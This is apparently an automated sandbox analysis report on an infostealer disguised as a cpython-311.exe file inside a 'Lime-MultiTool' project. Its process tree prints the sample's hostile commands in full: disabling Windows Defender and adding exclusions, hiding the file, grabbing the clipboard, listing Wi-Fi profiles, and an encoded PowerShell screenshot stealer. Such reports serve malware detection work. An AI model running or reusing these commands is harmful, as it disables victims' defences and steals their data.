Analysis
-
max time kernel
135s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-12-2024 12:10
Behavioral task
behavioral1
Sample
Lime-MultiTool-main/src/main.py
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Lime-MultiTool-main/src/main.py
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Lime-MultiTool-main/src/utils/__pycache__/cpython-311.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Lime-MultiTool-main/src/utils/__pycache__/cpython-311.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Lime-MultiTool-main/start.bat
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
Lime-MultiTool-main/start.bat
Resource
win10v2004-20241007-en
General
-
Target
Lime-MultiTool-main/src/utils/__pycache__/cpython-311.exe
-
Size
7.4MB
-
MD5
1a2ff293768d10b8c99d3cd2950164b9
-
SHA1
e9123a3d2a53b5f8d008db9608037dd0571f3cae
-
SHA256
3c09a37412bf3981e5d678b6598c2cdad32fcd6761fc649a50693ba45746e242
-
SHA512
ff8a853675431bc36d88288546d7f467f239ae2e4e7ef019476ac4ca06f715e88f201753d7201dbfacb3b6dca51be764036372de8a8c0def29e00ae5e9469941
-
SSDEEP
98304:FWeYgI6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3z5UTfHfyk6LK4dSI23o7yc:FPYmOshoKMuIkhVastRL5Di3tO/ys42O
Malware Config
Signatures
-
pid Process 4372 powershell.exe 64 powershell.exe 3024 powershell.exe 64 powershell.exe 2828 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3776 powershell.exe 4760 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2136 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 1924 cpython-311.exe 1924 cpython-311.exe 1924 cpython-311.exe 1924 cpython-311.exe 1924 cpython-311.exe 1924 cpython-311.exe 1924 cpython-311.exe 1924 cpython-311.exe 1924 cpython-311.exe 1924 cpython-311.exe 1924 cpython-311.exe 1924 cpython-311.exe 1924 cpython-311.exe 1924 cpython-311.exe 1924 cpython-311.exe 1924 cpython-311.exe 1924 cpython-311.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 21 discord.com 22 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 3540 tasklist.exe 4008 tasklist.exe 2680 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 2432 cmd.exe -
resource yara_rule behavioral4/files/0x0008000000023c4a-21.dat upx behavioral4/memory/1924-25-0x00007FFA36C80000-0x00007FFA37269000-memory.dmp upx behavioral4/files/0x0008000000023c10-27.dat upx behavioral4/files/0x000b000000023c43-31.dat upx behavioral4/memory/1924-30-0x00007FFA4ACB0000-0x00007FFA4ACD3000-memory.dmp upx behavioral4/memory/1924-32-0x00007FFA4D830000-0x00007FFA4D83F000-memory.dmp upx behavioral4/files/0x0008000000023c29-38.dat upx behavioral4/memory/1924-40-0x00007FFA467C0000-0x00007FFA467ED000-memory.dmp upx behavioral4/files/0x0008000000023c0f-41.dat upx behavioral4/memory/1924-43-0x00007FFA46390000-0x00007FFA463A9000-memory.dmp upx behavioral4/files/0x0008000000023c2c-44.dat upx behavioral4/memory/1924-47-0x00007FFA45CA0000-0x00007FFA45CC3000-memory.dmp upx behavioral4/files/0x0008000000023c5b-46.dat upx behavioral4/memory/1924-49-0x00007FFA367D0000-0x00007FFA36947000-memory.dmp upx behavioral4/files/0x0008000000023c2b-50.dat upx behavioral4/memory/1924-53-0x00007FFA46AE0000-0x00007FFA46AF9000-memory.dmp upx behavioral4/files/0x0008000000023c5a-52.dat upx behavioral4/memory/1924-56-0x00007FFA468A0000-0x00007FFA468AD000-memory.dmp upx behavioral4/files/0x0008000000023c2d-57.dat upx behavioral4/files/0x0008000000023c2e-58.dat upx behavioral4/files/0x0016000000023c44-60.dat upx behavioral4/memory/1924-59-0x00007FFA46860000-0x00007FFA46893000-memory.dmp upx behavioral4/memory/1924-65-0x00007FFA460E0000-0x00007FFA461AD000-memory.dmp upx behavioral4/memory/1924-64-0x00007FFA36C80000-0x00007FFA37269000-memory.dmp upx behavioral4/memory/1924-68-0x00007FFA4ACB0000-0x00007FFA4ACD3000-memory.dmp upx behavioral4/memory/1924-66-0x00007FFA361E0000-0x00007FFA36700000-memory.dmp upx behavioral4/memory/1924-71-0x00007FFA46840000-0x00007FFA46854000-memory.dmp upx behavioral4/files/0x0008000000023c23-70.dat upx behavioral4/memory/1924-75-0x00007FFA46830000-0x00007FFA4683D000-memory.dmp upx behavioral4/memory/1924-74-0x00007FFA467C0000-0x00007FFA467ED000-memory.dmp upx behavioral4/files/0x0008000000023c5c-79.dat upx behavioral4/files/0x0008000000023c2a-73.dat upx behavioral4/memory/1924-80-0x00007FFA46390000-0x00007FFA463A9000-memory.dmp upx behavioral4/memory/1924-81-0x00007FFA45FC0000-0x00007FFA460DC000-memory.dmp upx behavioral4/memory/1924-144-0x00007FFA45CA0000-0x00007FFA45CC3000-memory.dmp upx behavioral4/memory/1924-186-0x00007FFA367D0000-0x00007FFA36947000-memory.dmp upx behavioral4/memory/1924-248-0x00007FFA46AE0000-0x00007FFA46AF9000-memory.dmp upx behavioral4/memory/1924-276-0x00007FFA46860000-0x00007FFA46893000-memory.dmp upx behavioral4/memory/1924-292-0x00007FFA361E0000-0x00007FFA36700000-memory.dmp upx behavioral4/memory/1924-291-0x00007FFA460E0000-0x00007FFA461AD000-memory.dmp upx behavioral4/memory/1924-315-0x00007FFA46840000-0x00007FFA46854000-memory.dmp upx behavioral4/memory/1924-322-0x00007FFA367D0000-0x00007FFA36947000-memory.dmp upx behavioral4/memory/1924-316-0x00007FFA36C80000-0x00007FFA37269000-memory.dmp upx behavioral4/memory/1924-317-0x00007FFA4ACB0000-0x00007FFA4ACD3000-memory.dmp upx behavioral4/memory/1924-331-0x00007FFA36C80000-0x00007FFA37269000-memory.dmp upx behavioral4/memory/1924-345-0x00007FFA45FC0000-0x00007FFA460DC000-memory.dmp upx behavioral4/memory/1924-344-0x00007FFA46830000-0x00007FFA4683D000-memory.dmp upx behavioral4/memory/1924-355-0x00007FFA460E0000-0x00007FFA461AD000-memory.dmp upx behavioral4/memory/1924-354-0x00007FFA46860000-0x00007FFA46893000-memory.dmp upx behavioral4/memory/1924-353-0x00007FFA468A0000-0x00007FFA468AD000-memory.dmp upx behavioral4/memory/1924-352-0x00007FFA46AE0000-0x00007FFA46AF9000-memory.dmp upx behavioral4/memory/1924-351-0x00007FFA367D0000-0x00007FFA36947000-memory.dmp upx behavioral4/memory/1924-350-0x00007FFA45CA0000-0x00007FFA45CC3000-memory.dmp upx behavioral4/memory/1924-349-0x00007FFA46390000-0x00007FFA463A9000-memory.dmp upx behavioral4/memory/1924-348-0x00007FFA467C0000-0x00007FFA467ED000-memory.dmp upx behavioral4/memory/1924-347-0x00007FFA4D830000-0x00007FFA4D83F000-memory.dmp upx behavioral4/memory/1924-346-0x00007FFA4ACB0000-0x00007FFA4ACD3000-memory.dmp upx behavioral4/memory/1924-342-0x00007FFA361E0000-0x00007FFA36700000-memory.dmp upx behavioral4/memory/1924-343-0x00007FFA46840000-0x00007FFA46854000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4728 cmd.exe 760 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4472 cmd.exe 828 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2812 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1628 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 760 PING.EXE -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 64 powershell.exe 4372 powershell.exe 2828 powershell.exe 64 powershell.exe 64 powershell.exe 4372 powershell.exe 4372 powershell.exe 2828 powershell.exe 2828 powershell.exe 3776 powershell.exe 3776 powershell.exe 3776 powershell.exe 1308 powershell.exe 1308 powershell.exe 1308 powershell.exe 64 powershell.exe 64 powershell.exe 3676 powershell.exe 3676 powershell.exe 3024 powershell.exe 3024 powershell.exe 5088 powershell.exe 5088 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 64 powershell.exe Token: SeDebugPrivilege 4372 powershell.exe Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 4008 tasklist.exe Token: SeDebugPrivilege 3540 tasklist.exe Token: SeIncreaseQuotaPrivilege 4588 WMIC.exe Token: SeSecurityPrivilege 4588 WMIC.exe Token: SeTakeOwnershipPrivilege 4588 WMIC.exe Token: SeLoadDriverPrivilege 4588 WMIC.exe Token: SeSystemProfilePrivilege 4588 WMIC.exe Token: SeSystemtimePrivilege 4588 WMIC.exe Token: SeProfSingleProcessPrivilege 4588 WMIC.exe Token: SeIncBasePriorityPrivilege 4588 WMIC.exe Token: SeCreatePagefilePrivilege 4588 WMIC.exe Token: SeBackupPrivilege 4588 WMIC.exe Token: SeRestorePrivilege 4588 WMIC.exe Token: SeShutdownPrivilege 4588 WMIC.exe Token: SeDebugPrivilege 4588 WMIC.exe Token: SeSystemEnvironmentPrivilege 4588 WMIC.exe Token: SeRemoteShutdownPrivilege 4588 WMIC.exe Token: SeUndockPrivilege 4588 WMIC.exe Token: SeManageVolumePrivilege 4588 WMIC.exe Token: 33 4588 WMIC.exe Token: 34 4588 WMIC.exe Token: 35 4588 WMIC.exe Token: 36 4588 WMIC.exe Token: SeIncreaseQuotaPrivilege 4588 WMIC.exe Token: SeSecurityPrivilege 4588 WMIC.exe Token: SeTakeOwnershipPrivilege 4588 WMIC.exe Token: SeLoadDriverPrivilege 4588 WMIC.exe Token: SeSystemProfilePrivilege 4588 WMIC.exe Token: SeSystemtimePrivilege 4588 WMIC.exe Token: SeProfSingleProcessPrivilege 4588 WMIC.exe Token: SeIncBasePriorityPrivilege 4588 WMIC.exe Token: SeCreatePagefilePrivilege 4588 WMIC.exe Token: SeBackupPrivilege 4588 WMIC.exe Token: SeRestorePrivilege 4588 WMIC.exe Token: SeShutdownPrivilege 4588 WMIC.exe Token: SeDebugPrivilege 4588 WMIC.exe Token: SeSystemEnvironmentPrivilege 4588 WMIC.exe Token: SeRemoteShutdownPrivilege 4588 WMIC.exe Token: SeUndockPrivilege 4588 WMIC.exe Token: SeManageVolumePrivilege 4588 WMIC.exe Token: 33 4588 WMIC.exe Token: 34 4588 WMIC.exe Token: 35 4588 WMIC.exe Token: 36 4588 WMIC.exe Token: SeDebugPrivilege 3776 powershell.exe Token: SeDebugPrivilege 2680 tasklist.exe Token: SeDebugPrivilege 1308 powershell.exe Token: SeDebugPrivilege 64 powershell.exe Token: SeDebugPrivilege 3676 powershell.exe Token: SeIncreaseQuotaPrivilege 1376 WMIC.exe Token: SeSecurityPrivilege 1376 WMIC.exe Token: SeTakeOwnershipPrivilege 1376 WMIC.exe Token: SeLoadDriverPrivilege 1376 WMIC.exe Token: SeSystemProfilePrivilege 1376 WMIC.exe Token: SeSystemtimePrivilege 1376 WMIC.exe Token: SeProfSingleProcessPrivilege 1376 WMIC.exe Token: SeIncBasePriorityPrivilege 1376 WMIC.exe Token: SeCreatePagefilePrivilege 1376 WMIC.exe Token: SeBackupPrivilege 1376 WMIC.exe Token: SeRestorePrivilege 1376 WMIC.exe Token: SeShutdownPrivilege 1376 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4860 wrote to memory of 1924 4860 cpython-311.exe 84 PID 4860 wrote to memory of 1924 4860 cpython-311.exe 84 PID 1924 wrote to memory of 4692 1924 cpython-311.exe 85 PID 1924 wrote to memory of 4692 1924 cpython-311.exe 85 PID 1924 wrote to memory of 3940 1924 cpython-311.exe 86 PID 1924 wrote to memory of 3940 1924 cpython-311.exe 86 PID 1924 wrote to memory of 2432 1924 cpython-311.exe 87 PID 1924 wrote to memory of 2432 1924 cpython-311.exe 87 PID 1924 wrote to memory of 3024 1924 cpython-311.exe 91 PID 1924 wrote to memory of 3024 1924 cpython-311.exe 91 PID 3940 wrote to memory of 4372 3940 cmd.exe 93 PID 3940 wrote to memory of 4372 3940 cmd.exe 93 PID 4692 wrote to memory of 64 4692 cmd.exe 95 PID 4692 wrote to memory of 64 4692 cmd.exe 95 PID 2432 wrote to memory of 1548 2432 cmd.exe 94 PID 2432 wrote to memory of 1548 2432 cmd.exe 94 PID 1924 wrote to memory of 2260 1924 cpython-311.exe 96 PID 1924 wrote to memory of 2260 1924 cpython-311.exe 96 PID 3024 wrote to memory of 2828 3024 cmd.exe 97 PID 3024 wrote to memory of 2828 3024 cmd.exe 97 PID 1924 wrote to memory of 1680 1924 cpython-311.exe 98 PID 1924 wrote to memory of 1680 1924 cpython-311.exe 98 PID 1924 wrote to memory of 3988 1924 cpython-311.exe 101 PID 1924 wrote to memory of 3988 1924 cpython-311.exe 101 PID 1680 wrote to memory of 4008 1680 cmd.exe 104 PID 1680 wrote to memory of 4008 1680 cmd.exe 104 PID 2260 wrote to memory of 3540 2260 cmd.exe 102 PID 2260 wrote to memory of 3540 2260 cmd.exe 102 PID 1924 wrote to memory of 4760 1924 cpython-311.exe 105 PID 1924 wrote to memory of 4760 1924 cpython-311.exe 105 PID 1924 wrote to memory of 4176 1924 cpython-311.exe 107 PID 1924 wrote to memory of 4176 1924 cpython-311.exe 107 PID 1924 wrote to memory of 4140 1924 cpython-311.exe 109 PID 1924 wrote to memory of 4140 1924 cpython-311.exe 109 PID 1924 wrote to memory of 4472 1924 cpython-311.exe 110 PID 1924 wrote to memory of 4472 1924 cpython-311.exe 110 PID 1924 wrote to memory of 712 1924 cpython-311.exe 111 PID 1924 wrote to memory of 712 1924 cpython-311.exe 111 PID 3988 wrote to memory of 4588 3988 cmd.exe 115 PID 3988 wrote to memory of 4588 3988 cmd.exe 115 PID 1924 wrote to memory of 964 1924 cpython-311.exe 117 PID 1924 wrote to memory of 964 1924 cpython-311.exe 117 PID 4140 wrote to memory of 3944 4140 cmd.exe 119 PID 4140 wrote to memory of 3944 4140 cmd.exe 119 PID 4760 wrote to memory of 3776 4760 cmd.exe 120 PID 4760 wrote to memory of 3776 4760 cmd.exe 120 PID 712 wrote to memory of 1628 712 cmd.exe 121 PID 712 wrote to memory of 1628 712 cmd.exe 121 PID 964 wrote to memory of 1308 964 cmd.exe 122 PID 964 wrote to memory of 1308 964 cmd.exe 122 PID 4472 wrote to memory of 828 4472 cmd.exe 124 PID 4472 wrote to memory of 828 4472 cmd.exe 124 PID 4176 wrote to memory of 2680 4176 cmd.exe 123 PID 4176 wrote to memory of 2680 4176 cmd.exe 123 PID 1924 wrote to memory of 1504 1924 cpython-311.exe 125 PID 1924 wrote to memory of 1504 1924 cpython-311.exe 125 PID 1504 wrote to memory of 60 1504 cmd.exe 127 PID 1504 wrote to memory of 60 1504 cmd.exe 127 PID 1924 wrote to memory of 4440 1924 cpython-311.exe 128 PID 1924 wrote to memory of 4440 1924 cpython-311.exe 128 PID 4440 wrote to memory of 3404 4440 cmd.exe 130 PID 4440 wrote to memory of 3404 4440 cmd.exe 130 PID 1924 wrote to memory of 2748 1924 cpython-311.exe 131 PID 1924 wrote to memory of 2748 1924 cpython-311.exe 131 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1548 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe"C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe"C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:64
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\Lime-MultiTool-main\src\utils\__pycache__\cpython-311.exe"4⤵
- Views/modifies file attributes
PID:1548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:3944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:712 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:1628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:964 -
